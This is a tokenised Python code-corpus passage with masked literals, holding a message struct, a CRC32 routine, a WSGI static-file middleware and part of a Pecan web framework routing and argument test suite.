: <EOL> endpoint = <NUM_LIT> <EOL> endianness = '<STR_LIT:<>' <EOL> register = False <EOL> class App ( IntEnum ) : <EOL> Sports = <NUM_LIT> <EOL> Golf = <NUM_LIT> <EOL> app = Uint8 ( enum = App ) <EOL> row_size = Uint16 ( ) <EOL> info_flags = Uint16 ( default = <NUM_LIT> ) <EOL> origin_x = Uint16 ( ) <EOL> origin_y = Uint16 ( ) <EOL> size_x = Uint16 ( ) <EOL> size_y = Uint16 ( ) <EOL> image_data = BinaryArray ( ) 
</s>
<s> from __future__ import division <EOL> from six . moves import range <EOL> import array <EOL> CRC_POLY = <NUM_LIT> <EOL> def process_word ( data , crc = <NUM_LIT> ) : <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> d_array = array . array ( '<STR_LIT:B>' , data ) <EOL> for x in range ( <NUM_LIT:0> , <NUM_LIT:4> - len ( data ) ) : <EOL> d_array . insert ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> d_array . reverse ( ) <EOL> data = d_array . tostring ( ) <EOL> d = array . array ( '<STR_LIT:I>' , data ) [ <NUM_LIT:0> ] <EOL> crc = crc ^ d <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:32> ) : <EOL> if ( crc & <NUM_LIT> ) != <NUM_LIT:0> : <EOL> crc = ( crc << <NUM_LIT:1> ) ^ CRC_POLY <EOL> else : <EOL> crc = ( crc << <NUM_LIT:1> ) <EOL> result = crc & <NUM_LIT> <EOL> return result <EOL> def process_buffer ( buf , c = <NUM_LIT> ) : <EOL> word_count = len ( buf ) // <NUM_LIT:4> <EOL> if len ( buf ) % <NUM_LIT:4> != <NUM_LIT:0> : <EOL> word_count += <NUM_LIT:1> <EOL> crc = c <EOL> for i in range ( <NUM_LIT:0> , word_count ) : <EOL> crc = process_word ( buf [ i * <NUM_LIT:4> : ( i + <NUM_LIT:1> ) * <NUM_LIT:4> ] , crc ) <EOL> return crc <EOL> def crc32 ( data ) : <EOL> return process_buffer ( data ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import mimetypes <EOL> from datetime import datetime <EOL> from time import gmtime <EOL> import six <EOL> class FileWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , file , buffer_size = <NUM_LIT> ) : <EOL> self . file = file <EOL> self . buffer_size = buffer_size <EOL> def close ( self ) : <EOL> if hasattr ( self . file , '<STR_LIT>' ) : <EOL> self . file . close ( ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> data = self . file . read ( self . buffer_size ) <EOL> if data : <EOL> return data <EOL> raise StopIteration ( ) <EOL> if six . PY3 : <EOL> FileWrapper . __next__ = FileWrapper . next <EOL> def wrap_file ( environ , file , buffer_size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return environ . get ( '<STR_LIT>' , FileWrapper ) ( file , buffer_size ) <EOL> def _dump_date ( d , delim ) : <EOL> """<STR_LIT>""" <EOL> if d is None : <EOL> d = gmtime ( ) <EOL> elif isinstance ( d , datetime ) : <EOL> d = d . utctimetuple ( ) <EOL> elif isinstance ( d , ( int , float ) ) : <EOL> d = gmtime ( d ) <EOL> return '<STR_LIT>' % ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) [ d . tm_wday ] , <EOL> d . tm_mday , delim , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) [ d . tm_mon - <NUM_LIT:1> ] , <EOL> delim , str ( d . tm_year ) , d . tm_hour , d . tm_min , d . tm_sec <EOL> ) <EOL> def http_date ( timestamp = None ) : <EOL> """<STR_LIT>""" <EOL> return _dump_date ( timestamp , '<STR_LIT:U+0020>' ) <EOL> class StaticFileMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , directory , fallback_mimetype = '<STR_LIT>' ) : <EOL> self . app = app <EOL> self . loader = self . get_directory_loader ( directory ) <EOL> self . 
fallback_mimetype = fallback_mimetype <EOL> def _opener ( self , filename ) : <EOL> return lambda : ( <EOL> open ( filename , '<STR_LIT:rb>' ) , <EOL> datetime . utcfromtimestamp ( os . path . getmtime ( filename ) ) , <EOL> int ( os . path . getsize ( filename ) ) <EOL> ) <EOL> def get_directory_loader ( self , directory ) : <EOL> def loader ( path ) : <EOL> path = path or directory <EOL> if path is not None : <EOL> path = os . path . join ( directory , path ) <EOL> if os . path . isfile ( path ) : <EOL> return os . path . basename ( path ) , self . _opener ( path ) <EOL> return None , None <EOL> return loader <EOL> def __call__ ( self , environ , start_response ) : <EOL> cleaned_path = environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> for sep in os . sep , os . altsep : <EOL> if sep and sep != '<STR_LIT:/>' : <EOL> cleaned_path = cleaned_path . replace ( sep , '<STR_LIT:/>' ) <EOL> path = '<STR_LIT:/>' . join ( [ '<STR_LIT>' ] + [ x for x in cleaned_path . split ( '<STR_LIT:/>' ) <EOL> if x and x != '<STR_LIT:..>' ] ) <EOL> real_filename , file_loader = self . loader ( path [ <NUM_LIT:1> : ] ) <EOL> if file_loader is None : <EOL> return self . app ( environ , start_response ) <EOL> guessed_type = mimetypes . guess_type ( real_filename ) <EOL> mime_type = guessed_type [ <NUM_LIT:0> ] or self . fallback_mimetype <EOL> f , mtime , file_size = file_loader ( ) <EOL> headers = [ ( '<STR_LIT>' , http_date ( ) ) ] <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> headers . extend ( ( <EOL> ( '<STR_LIT:Content-Type>' , mime_type ) , <EOL> ( '<STR_LIT>' , str ( file_size ) ) , <EOL> ( '<STR_LIT>' , http_date ( mtime ) ) <EOL> ) ) <EOL> start_response ( '<STR_LIT>' , headers ) <EOL> return wrap_file ( environ , f ) </s>
<s> import time <EOL> from json import dumps , loads <EOL> import warnings <EOL> from webtest import TestApp <EOL> from six import b as b_ <EOL> from six import u as u_ <EOL> import webob <EOL> import mock <EOL> from pecan import Pecan , expose , abort , Request , Response <EOL> from pecan . rest import RestController <EOL> from pecan . hooks import PecanHook , HookController <EOL> from pecan . tests import PecanTestCase <EOL> class TestThreadingLocalUsage ( PecanTestCase ) : <EOL> @ property <EOL> def root ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def warning ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ expose ( generic = True ) <EOL> def generic ( self ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> @ generic . when ( method = '<STR_LIT>' ) <EOL> def generic_put ( self , _id ) : <EOL> return ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return RootController <EOL> def test_locals_are_not_used ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> self . assertRaises ( AssertionError , Pecan , self . root ) <EOL> def test_threadlocal_argument_warning ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . get , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_threadlocal_argument_warning_on_generic ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . 
root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . get , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_threadlocal_argument_warning_on_generic_delegate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' , side_effect = AssertionError ( ) ) : <EOL> app = TestApp ( Pecan ( self . root ( ) , use_context_locals = False ) ) <EOL> self . assertRaises ( <EOL> TypeError , <EOL> app . put , <EOL> '<STR_LIT>' <EOL> ) <EOL> class TestIndexRouting ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_empty_root ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_index_html ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> class TestManualResponse ( PecanTestCase ) : <EOL> def test_manual_response ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> resp = webob . Response ( resp . environ ) <EOL> resp . body = b_ ( '<STR_LIT>' ) <EOL> return resp <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT:/>' ) <EOL> assert r . body == b_ ( '<STR_LIT>' ) , r . 
body <EOL> class TestDispatch ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class SubSubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> class SubController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> sub = SubSubController ( ) <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT:/>' <EOL> @ expose ( ) <EOL> def deeper ( self , req , resp ) : <EOL> assert isinstance ( req , webob . BaseRequest ) <EOL> assert isinstance ( resp , webob . Response ) <EOL> return '<STR_LIT>' <EOL> sub = SubController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:/>' ) <EOL> def test_one_level ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_one_level_with_trailing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_two_levels ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_levels_with_trailing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> def test_three_levels ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> class TestLookups ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class LookupController ( object ) : <EOL> def __init__ ( self , someID ) : <EOL> self . someID = someID <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT>' % self . someID <EOL> @ expose ( ) <EOL> def name ( self , req , resp ) : <EOL> return '<STR_LIT>' % self . someID <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return '<STR_LIT:/>' <EOL> @ expose ( ) <EOL> def _lookup ( self , someID , * remainder ) : <EOL> return LookupController ( someID ) , remainder <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_index ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT:/>' ) <EOL> def test_lookup ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_lookup_with_method ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_lookup_with_wrong_argspec ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def _lookup ( self , someID ) : <EOL> return '<STR_LIT>' <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . 
simplefilter ( "<STR_LIT:ignore>" ) <EOL> app = TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> r = app . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert r . status_int == <NUM_LIT> <EOL> class TestCanonicalLookups ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class LookupController ( object ) : <EOL> def __init__ ( self , someID ) : <EOL> self . someID = someID <EOL> @ expose ( ) <EOL> def index ( self , req , resp ) : <EOL> return self . someID <EOL> class UserController ( object ) : <EOL> @ expose ( ) <EOL> def _lookup ( self , someID , * remainder ) : <EOL> return LookupController ( someID ) , remainder <EOL> class RootController ( object ) : <EOL> users = UserController ( ) <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_canonical_lookup ( self ) : <EOL> assert self . app_ . get ( '<STR_LIT>' , expect_errors = <NUM_LIT> ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' , expect_errors = <NUM_LIT> ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' ) . status_int == <NUM_LIT> <EOL> assert self . app_ . get ( '<STR_LIT>' ) . body == b_ ( '<STR_LIT:100>' ) <EOL> class TestControllerArguments ( PecanTestCase ) : <EOL> @ property <EOL> def app_ ( self ) : <EOL> class RootController ( object ) : <EOL> @ expose ( ) <EOL> def index ( self , req , resp , id ) : <EOL> return '<STR_LIT>' % id <EOL> @ expose ( ) <EOL> def multiple ( self , req , resp , one , two ) : <EOL> return '<STR_LIT>' % ( one , two ) <EOL> @ expose ( ) <EOL> def optional ( self , req , resp , id = None ) : <EOL> return '<STR_LIT>' % str ( id ) <EOL> @ expose ( ) <EOL> def multiple_optional ( self , req , resp , one = None , two = None , <EOL> three = None ) : <EOL> return '<STR_LIT>' % ( one , two , three ) <EOL> @ expose ( ) <EOL> def variable_args ( self , req , resp , * args ) : <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . 
join ( args ) <EOL> @ expose ( ) <EOL> def variable_kwargs ( self , req , resp , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( data ) <EOL> @ expose ( ) <EOL> def variable_all ( self , req , resp , * args , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( list ( args ) + data ) <EOL> @ expose ( ) <EOL> def eater ( self , req , resp , id , dummy = None , * args , ** kwargs ) : <EOL> data = [ <EOL> '<STR_LIT>' % ( key , kwargs [ key ] ) <EOL> for key in sorted ( kwargs . keys ( ) ) <EOL> ] <EOL> return '<STR_LIT>' % ( <EOL> id , <EOL> dummy , <EOL> '<STR_LIT:U+002CU+0020>' . join ( list ( args ) + data ) <EOL> ) <EOL> @ expose ( ) <EOL> def _route ( self , args , request ) : <EOL> if hasattr ( self , args [ <NUM_LIT:0> ] ) : <EOL> return getattr ( self , args [ <NUM_LIT:0> ] ) , args [ <NUM_LIT:1> : ] <EOL> else : <EOL> return self . index , args <EOL> return TestApp ( Pecan ( RootController ( ) , use_context_locals = False ) ) <EOL> def test_required_argument ( self ) : <EOL> try : <EOL> r = self . app_ . get ( '<STR_LIT:/>' ) <EOL> assert r . status_int != <NUM_LIT:200> <EOL> except Exception as ex : <EOL> assert type ( ex ) == TypeError <EOL> assert ex . args [ <NUM_LIT:0> ] in ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) <EOL> def test_single_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_single_argument_with_encoded_url ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_two_arguments ( self ) : <EOL> r = self . app_ . 
get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_keyword_argument_with_encoded_url ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_argument_and_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_encoded_argument_and_keyword_argument ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_explicit_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT:/>' , { '<STR_LIT:id>' : '<STR_LIT:4>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_path_with_explicit_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_kwargs_from_root ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT:/>' , { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_url_encode ( self ) : <EOL> r = self . app_ . 
get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_positional_args_with_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_positional_args_with_url_encoded_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_url_encoded ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_missing ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_args_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_url_encoded_positional_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT:4>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_arguments_with_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_positional_url_encoded_arguments_with_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT:id>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_optional_arg_with_multiple_url_encoded_dictionary_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_one_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_one_url_encoded_arg ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_all_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_all_url_encoded_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_too_many_args ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' , status = <NUM_LIT> ) <EOL> assert r . status_int == <NUM_LIT> <EOL> def test_multiple_optional_positional_args_with_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . 
body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_url_encoded_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_string_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_encoded_str_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT:1>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_with_encoded_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_positional_args_and_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_encoded_positional_args_and_dict_kwargs ( self ) : <EOL> r = self . app_ . post ( '<STR_LIT>' , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_kwargs ( self ) : <EOL> r = self . app_ . get ( '<STR_LIT>' ) <EOL> assert r . status_int == <NUM_LIT:200> <EOL> assert r . body == b_ ( '<STR_LIT>' ) <EOL> def test_multiple_optional_args_with_multiple_encoded_kwargs ( self ) : <EOL> r = self . app_ . 
